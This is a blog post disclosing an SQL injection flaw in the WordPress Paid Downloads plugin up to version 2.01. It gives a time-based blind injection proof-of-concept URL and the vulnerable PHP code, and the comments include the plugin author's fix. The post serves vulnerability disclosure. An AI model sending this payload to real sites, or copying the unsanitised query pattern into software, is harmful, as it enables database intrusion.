# Exploit Title: WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerabi lity # Date: 2011-09-07 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/paid-downloads.2.01.zip # Version: 2.01 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/paid-downloads/download.php?download_key= -1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- Vulnerable code --------------- $download_key = $_GET["download_key"]; $sql = "SELECT * FROM ".$wpdb->prefix."pd_downloadlinks WHERE download_key = '". $download_key."'"; $link_details = $wpdb->get_row($sql, ARRAY_A);p.s. author has been contacted (no reply yet)
Thursday, September 8, 2011
WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability
Subscribe to:
Post Comments (Atom)
4 comments:
If Magic Quotes is On You get this : SELECT * FROM TABLE_downloadlinks WHERE download_key = '1\' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--
Well, I know :). Have you read the note: "magic_quotes has to be turned off". Please go here for more information. Lots of admins tend to disable it forcefully because they are annoyed by those slashes inserted making them susceptible to this kind of attack.
Hi Miroslav. I'm an author of Paid Downloads plugin. Thanks for showing security issue. Fixed one in version 2.21:
[code]
$download_key = $_GET["download_key"];
$download_key = preg_replace('/[^a-zA-Z0-9]/', '', $download_key);
$sql = "SELECT * FROM ".$wpdb->prefix."pd_downloadlinks WHERE download_key = '".$download_key."'";
[/code]
http://wordpress.org/extend/plugins/paid-downloads/
Now I'm getting the notice: "ERROR: Service is not available" everytime I try to upload a file, since version 2.22 upgrade. Any ideas?
-Garrett
Post a Comment